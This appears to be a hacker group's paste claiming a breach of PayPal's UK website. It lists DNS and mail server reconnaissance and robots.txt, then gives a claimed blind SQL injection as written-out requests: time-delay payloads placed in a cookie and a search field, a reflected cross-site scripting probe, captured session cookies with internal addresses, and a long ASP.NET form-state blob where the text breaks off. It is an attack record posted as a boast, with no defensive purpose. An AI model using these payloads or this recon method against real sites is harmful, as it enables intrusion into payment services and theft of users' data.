Skip to main content

#PayPal [ www.paypal.co.uk ] hacked by #NullCrew @Saturnine_NC

http://pastebin.com/raw.php?i=xV6LpFAy

                              _   _       _ _ _____                  
                                | \ | |     | | /  __ \                  
                                |  \| |_   _| | | /  \/_ __ _____      __
                                | . ` | | | | | | |   | '__/ _ \ \ /\ / /
                                | |\  | |_| | | | \__/\ | |  __/\ V  V /
                                \_| \_/\__,_|_|_|\____/_|  \___| \_/\_/  
                                             @Saturnine_NC
                                #######################################

                                           www.paypal.co.uk

                                #######################################


PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders.

PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient's account type.[2] In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies.

                                        -----   paypal.co.uk   -----


Host's addresses:
__________________

paypal.co.uk                             5        IN    A        173.0.89.66
paypal.co.uk                             5        IN    A        173.0.89.102
paypal.co.uk                             5        IN    A        173.0.85.66
paypal.co.uk                             5        IN    A        173.0.85.102
paypal.co.uk                             5        IN    A        173.0.85.169


Name Servers:
______________

ns3.isc-sns.info                         5        IN    A        63.243.194.1
ns1.isc-sns.net                          5        IN    A        72.52.71.1
ns2.isc-sns.com                          5        IN    A        38.103.2.1


Mail (MX) Servers:
___________________

lore.ebay.com                            5        IN    A        216.113.175.103
data.ebay.com                            5        IN    A        66.135.195.180
gort.ebay.com                            5        IN    A        216.113.167.215


                                #######################################

AkamaiGHost >  2.20.239.186

                                #######################################

Robots.txt >
### BEGIN FILE ###

# PayPal robots.txt file

User-agent: *
Disallow: /xclick-auction/
Disallow: /affil/
Disallow: /*?cmd=_flow
Disallow: /*?SESSION
Disallow: /*?cmd=_s-xclick
Disallow: /subscriptions/
Visit-time: 0200-1200    # GMT  (6:00pm pst to 4:00am pst)
Crawl-Delay: 15          # 15 seconds per page
Request-rate: 1/15       # 1 page in 15 seconds

### END FILE ###

                                #######################################

RFC-1918 - Address Allocation for Private Internets

http://pastebin.com/raw.php?i=Vy9LwaDh

                                #######################################

Vulnerability > Remote POST Blind SQL Injection


Windows IIS 7.5

| x_paypal.co.uk_

| x/Blog/news/John-Lewis-now-accepting-PayPal/x

| Cookie input navlns was set to 0.0; waitfor delay '0:0:1'

cwrClyrK4LoCV1fydGbAxiNL6iG=%7c97Cv2dBbGVw2sCwBz_-mNj8RJzcSWvva7LJWXdxfDKVvIMqbW7cu-b1Et7FNGXz09r_T40%7cudlEhFSrvMVSmKBnb7ug7glHnFgrpGIo2MDwNGaXTcFzKNeSfmPA3vEP7ipFtJe2luGbOm%7c; cookie_check=yes; Apache=10.74.8.174.1340487441081682; LANG=; KHcl0EuY7AKSMgfvHl7J5E7hPtK=IiZnWHQWertizzzQ-92hbeIL3HaFqCH1-GpKmiB0rPwGijSIWNjlJ1DR6yufjvtf0TOcjmTZcJNVmE3n; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1%26HOME_VERSION%3d1340596435; navcmd=_home-general; navlns=0.0%3B waitfor delay %270%3A0%3A1%27 -- ; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/blog/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=2057&NavLanguage=2057&LastValidLanguageID=2057&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.paypal.co.uk&SiteLanguage=2057; EktGUID=3bc02390-2617-4e46-b284-960bb84c74d1; EkAnalytics=0; ASP.NET_SessionId=m2gsjhibnne50bhjsrxund2s; k=10.36.32.129.1340510441886023; s_sess=%20v31%3DD%253DpageName%3B; s_pers=%20gpv_events%3Dno%2520value%7C1340512622436%3B


URL encoded POST input ctl00%24ctl00%24cphBase%24cphBase%24cphSideBar%24ctl00%24ctl00%24txtSearch was set to '"()&%1<ScRiPt >prompt(935400)</ScRiPt>

The input is reflected in https://www.paypal.co.uk/blog/search/ to /blog/online%20safety/.

> POST /blog/online%20safety/

ctl00%24ctl00%24cphBase%24cphBase%24cphSideBar%24ctl00%24ctl00%24btnSearch=Search&ctl00%24ctl00%24cphBase%24cphBase%24cphSideBar%24ctl00%24ctl00%24hidSearchURL=%2fsearch%2f&ctl00%24ctl00%24cphBase%24cphBase%24cphSideBar%24ctl00%24ctl00%24txtSearch=1%20and%20sleep%282.231%29%20&EktronClientManager=1660553448%2c-1622884131%2c-17165098%2c-308648369%2c-1162319347%2c-1672419562%2c718671612%2c1353742698%2c-1862914044%2c627539588%2c57632104&__EVENTVALIDATION=%2fwEWBALt3uCpDAL%2fzfTkCgKyguyJBgKm%2f%2fvIBp%2fTLIrFPAp3rmxoFIH22S4TEcYY&__VIEWSTATE=%2fwEPDwUJMzc4Mjc5NzIyD2QWAmYPZBYCZg9kFgICBRBkZBYCAgUPZBYCAgEPZBYEAgEPZBYCAgEPZBYEZg9kFgQCBQ8UKwACZGRkAgcPZBYCAgEPFCsAAmQQFgJmAgIWAhQrAAEWBB4MTmV4dFBhZ2VUZXh0BQZbTmV4dF0eDExhc3RQYWdlVGV4dAUGW0xhc3RdFCsAARYEHg1GaXJzdFBhZ2VUZXh0BQdbRmlyc3RdHhBQcmV2aW91c1BhZ2VUZXh0BQZbUHJldl0WAmZmZAIBD2QWBAIBDxQrAAIPFgQeC18hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnQCAWRkFgJmD2QWBGYPFQYhL0Jsb2cvbmVlZC1oZWxwL09ubGluZS1JbnZvaWNpbmcvEE9ubGluZSBJbnZvaWNpbmclUG9zdGVkIEphbnVhcnkgMzAsIDIwMTIgYnkgSm9uIEJpc2hvcADRBDxzdHJvbmc%2bSG93IGRvIG15IGN1c3RvbWVycyBwYXkgbWU%2fPC9zdHJvbmc%2bIDxiciAvPkl0J3MgZWFzeS4gVGhleSBnZXQgeW91ciBpbnZvaWNlIGluIHRoZWlyIGluYm94IGFuZCBjbGljayB0aGUgcGF5bWVudCBidXR0b24gdG8gcGF5IHlvdS4gVGhleSdyZSB0YWtlbiB0byBhIHNlY3VyZSBQYXlQYWwgc2l0ZSB0byBjb21wbGV0ZSB0aGUgcGF5bWVudCB1c2luZyB0aGVpciBjcmVkaXQgY2FyZCwgYmFuayBhY2NvdW50LCBvciBQYXlQYWwgYmFsYW5jZS4gVGhleSBkb24ndCBldmVuIG5lZWQgYSBQYXlQYWwgYWNjb3VudC4gQ2hlY2sgb3V0IGhvdyBlYXN5IGl0IGlzIGluIG91ciBzdGVwLWJ5LXN0ZXAgZ3VpZGUuPGJyIC8%2bPHN0cm9uZz5Eb2VzIGl0IHRha2UgbG9uZyB0byBzZW5kIGFuIGludm9pY2U%2fPC9zdHJvbmc%2bIDxiciAvPkl0IHRha2VzIGEgZmV3IG1pbnV0ZXMgdG8gY3JlYXRlIGFuIGludm9pY2UgZnJvbSBzY3JhdGNoLiBUaGVuIHNhdmUgeW91ciBmYXZvcml0ZSB0ZW1wbGF0ZXMgYW5kIHF1aWNrbHkgdXBkYXRlIHRoZSBkZXRhaWxzIGZvciB5b3VyIG5leHQgY3VzdG9tZXIuIElmIHlvdSdyZSBtaXNzaW5nIGEgcGF5bWVudCwgIS9CbG9nL25lZWQtaGVscC9PbmxpbmUtSW52b2ljaW5nL2QCAQ8VAcMBPHN0cm9uZz5GaWxlZCBVbmRlcjo8L3N0cm9uZz4mbmJzcDsmbmJzcDs8YSBocmVmPSIvYmxvZy9zZWxsaW5nIiA%2bc2VsbGluZzwvYT4sJm5ic3A7Jm5ic3A7PGEgaHJlZj0iL2Jsb2cvbmVlZCUyMGhlbHAiID5uZWVkIGhlbHA8L2E%2bLCZuYnNwOyZuYnNwOzxhIGhyZWY9Ii9ibG9nL29ubGluZSUyMHNhZmV0eSIgPm9ubGluZSBzYWZldHk8L2E%2bZAIDDxYCHgdWaXNpYmxlaBYCAgEPFCsAAmQQFgJmAgIWAhQrAAEWBB8ABQZbTmV4dF0fAQUGW0xhc3RdFCsAARYEHwIFB1tGaXJzdF0fAwUGW1ByZXZdFgJmZmQCAw9kFgoCAQ8PFgIeLGN0bDAwJGN0bDAwJGNwaEJhc2UkY3BoQmFzZSRjcGhTaWRlQmFyJGN0bDAwMtMPAAEAAAD%2f%2f%2f%2f%2fAQAAAAAAAAAMAgAAAFJBcHBfU3ViQ29kZV9DU0NvZGUuamRmZC1sam8sIFZlcnNpb249MC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1udWxsBQEAAAAmU2VydmVyU2lkZS5TaWRlYmFySW5pdGlhbGl6YXRpb25WYWx1ZXMDAAAAHDxDb250cm9sUGF0aD5rX19CYWNraW5nRmllbGQkPEFzc29jaWF0ZWRDb250ZW50SUQ%2ba19fQmFja2luZ0ZpZWxkGzxQcm9wZXJ0aWVzPmtfX0JhY2tpbmdGaWVsZAEAAwniAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkRpY3Rpb25hcnlgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAABgMAAAAbfi9Db250cm9scy9TU1NlYXJjaEJveC5hc2N4AAAAAAAAAAAJBAAAAAQEAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQQAAAAJBQAAAAcAAAAJBgAAAAQFAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHBgAAAAABAAAABAAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT5%2f%2f%2f%2f5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQEBBggAAAARQ29udGFpbmVyQ1NTQ2xhc3MGCQAAAAZzZWFyY2gB9v%2f%2f%2f%2fn%2f%2f%2f8GCwAAAAhDU1NDbGFzcwYMAAAAAAHz%2f%2f%2f%2f%2bf%2f%2f%2fwYOAAAACVNlYXJjaFVSTAYPAAAACC9zZWFyY2gvAfD%2f%2f%2f%2f5%2f%2f%2f%2fBhEAAAAQU2VhcmNoQnV0dG9uVGV4dAYSAAAAAAtkFgJmD2QWAmYPZBYCZg8WAh4FY2xhc3NlFgICBQ8PFgIeBFRleHQFBlNlYXJjaGRkAgIPDxYCHixjdGwwMCRjdGwwMCRjcGhCYXNlJGNwaEJhc2UkY3BoU2lkZUJhciRjdGwwMTKzEgABAAAA%2f%2f%2f%2f%2fwEAAAAAAAAADAIAAABSQXBwX1N1YkNvZGVfQ1NDb2RlLmpkZmQtbGpvLCBWZXJzaW9uPTAuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49bnVsbAUBAAAAJlNlcnZlclNpZGUuU2lkZWJhckluaXRpYWxpemF0aW9uVmFsdWVzAwAAABw8Q29udHJvbFBhdGg%2ba19fQmFja2luZ0ZpZWxkJDxBc3NvY2lhdGVkQ29udGVudElEPmtfX0JhY2tpbmdGaWVsZBs8UHJvcGVydGllcz5rX19CYWNraW5nRmllbGQBAAMJ4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAAYDAAAAF34vQ29udHJvbHMvU1NWaWRlby5hc2N4AAAAAAAAAAAJBAAAAAQEAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQ4AAAAJBQAAABEAAAAJBgAAAAQFAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHBgAAAAABAAAADgAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT5%2f%2f%2f%2f5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQEBBggAAAARQ29udGFpbmVyQ1NTQ2xhc3MGCQAAAAV2aWRlbwH2%2f%2f%2f%2f%2bf%2f%2f%2fwYLAAAAB1ZpZGVvSUQGDAAAAAAB8%2f%2f%2f%2f%2fn%2f%2f%2f8GDgAAAApQbGF5TGlzdElEBg8AAAAQODA4QzMyMTI5OERCNEJGRAHw%2f%2f%2f%2f%2bf%2f%2f%2fwYRAAAAB1NodWZmbGUGEgAAAAR0cnVlAe3%2f%2f%2f%2f5%2f%2f%2f%2fBhQAAAAQTWluUGxheUxpc3RWaWRlbwYVAAAAATEB6v%2f%2f%2f%2fn%2f%2f%2f8GFwAAABFNYXhQbGF5TGlzdFZpZGVvcwYYAAAAATQB5%2f%2f%2f%2f%2fn%2f%2f%2f8GGgAAAAVXaWR0aAYbAAAAAzM1MAHk%2f%2f%2f%2f%2bf%2f%2f%2fwYdAAAABkhlaWdodAYeAAAAAzIwOAHh%2f%2f%2f%2f%2bf%2f%2f%2fwYgAAAACEF1dG9QbGF5BiEAAAAFZmFsc2UB3v%2f%2f%2f%2fn%2f%2f%2f8GIwAAAA9BbGxvd0Z1bGxTY3JlZW4GJAAAAAR0cnVlAdv%2f%2f%2f%2f5%2f%2f%2f%2fBiYAAAAMU2hvd0NvbnRyb2xzBicAAAAEdHJ1ZQHY%2f%2f%2f%2f%2bf%2f%2f%2fwYpAAAADk1vZGVzdEJyYW5kaW5nBioAAAAEdHJ1ZQHV%2f%2f%2f%2f%2bf%2f%2f%2fwYsAAAADFBsYXllclRoZW1lcwYtAAAABGRhcmsB0v%2f%2f%2f%2fn%2f%2f%2f8GLwAAAApMYW5ndWFnZUlEBjAAAAAAC2QWAmYPZBYCZg9kFgJmD2QWAmYPFgIfCQXSAjxkaXYgaWQ9ImRpdmN0bDAwX2N0bDAwX2NwaEJhc2VfY3BoQmFzZV9jcGhTaWRlQmFyX2N0bDAxX18yODQxY2U5IiBzdHlsZT0id2lkdGg6IDM1MHB4OyBoZWlnaHQ6IDIwOHB4OyAiID5Zb3UgbXVzdCA8YSB0YXJnZXQ9Il9ibGFuayIgaHJlZj0iaHR0cDovL3N1cHBvcnQuZ29vZ2xlLmNvbS9iaW4vYW5zd2VyLnB5P2hsPWVuJmFuc3dlcj0yMzg1MiIgPmVuYWJsZSBKYXZhU2NyaXB0PC9hPiBhbmQgaGF2ZSA8YSB0YXJnZXQ9Il9ibGFuayIgaHJlZj0iLy93d3cuYWRvYmUuY29tL2ZsYXNocGxheWVyLyIgPkZsYXNoIDg8L2E%2bIG9yIGdyZWF0ZXIgdG8gdmlldyB0aGlzIGNvbnRlbnQuPC9kaXY%2bZAIDDw8WAh4sY3RsMDAkY3RsMDAkY3BoQmFzZSRjcGhCYXNlJGNwaFNpZGVCYXIkY3RsMDIy3g8AAQAAAP%2f%2f%2f%2f8BAAAAAAAAAAwCAAAAUkFwcF9TdWJDb2RlX0NTQ29kZS5qZGZkLWxqbywgVmVyc2lvbj0wLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPW51bGwFAQAAACZTZXJ2ZXJTaWRlLlNpZGViYXJJbml0aWFsaXphdGlvblZhbHVlcwMAAAAcPENvbnRyb2xQYXRoPmtfX0JhY2tpbmdGaWVsZCQ8QXNzb2NpYXRlZENvbnRlbnRJRD5rX19CYWNraW5nRmllbGQbPFByb3BlcnRpZXM%2ba19fQmFja2luZ0ZpZWxkAQADCeIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAAGAwAAACh%2bL0NvbnRyb2xzL1NTQmxvZ1JlY2VudEFydGljbGVzTGlzdC5hc2N4AAAAAAAAAAAJBAAAAAQEAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQQAAAAJBQAAAAcAAAAJBgAAAAQFAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHBgAAAAABAAAABAAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT5%2f%2f%2f%2f5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQEBBggAAAARQ29udGFpbmVyQ1NTQ2xhc3MGCQAAAAdwb3N0LXNiAfb%2f%2f%2f%2f5%2f%2f%2f%2fBgsAAAAWTnVtYmVyT2ZJdGVtc1RvRGlzcGxheQYMAAAAATUB8%2f%2f%2f%2f%2fn%2f%2f%2f8GDgAAAAVUaXRsZQYPAAAAAAHw%2f%2f%2f%2f%2bf%2f%2f%2fwYRAAAACkxhbmd1YWdlSUQGEgAAAAALZGQCBA8PFgIeLGN0bDAwJGN0bDAwJGNwaEJhc2UkY3BoQmFzZSRjcGhTaWRlQmFyJGN0bDAzMtIPAAEAAAD%2f%2f%2f%2f%2fAQAAAAAAAAAMAgAAAFJBcHBfU3ViQ29kZV9DU0NvZGUuamRmZC1sam8sIFZlcnNpb249MC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1udWxsBQEAAAAmU2VydmVyU2lkZS5TaWRlYmFySW5pdGlhbGl6YXRpb25WYWx1ZXMDAAAAHDxDb250cm9sUGF0aD5rX19CYWNraW5nRmllbGQkPEFzc29jaWF0ZWRDb250ZW50SUQ%2ba19fQmFja2luZ0ZpZWxkGzxQcm9wZXJ0aWVzPmtfX0JhY2tpbmdGaWVsZAEAAwniAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkRpY3Rpb25hcnlgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAABgMAAAAcfi9Db250cm9scy9TU01vc3RWaWV3ZWQuYXNjeAAAAAAAAAAACQQAAAAEBAAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc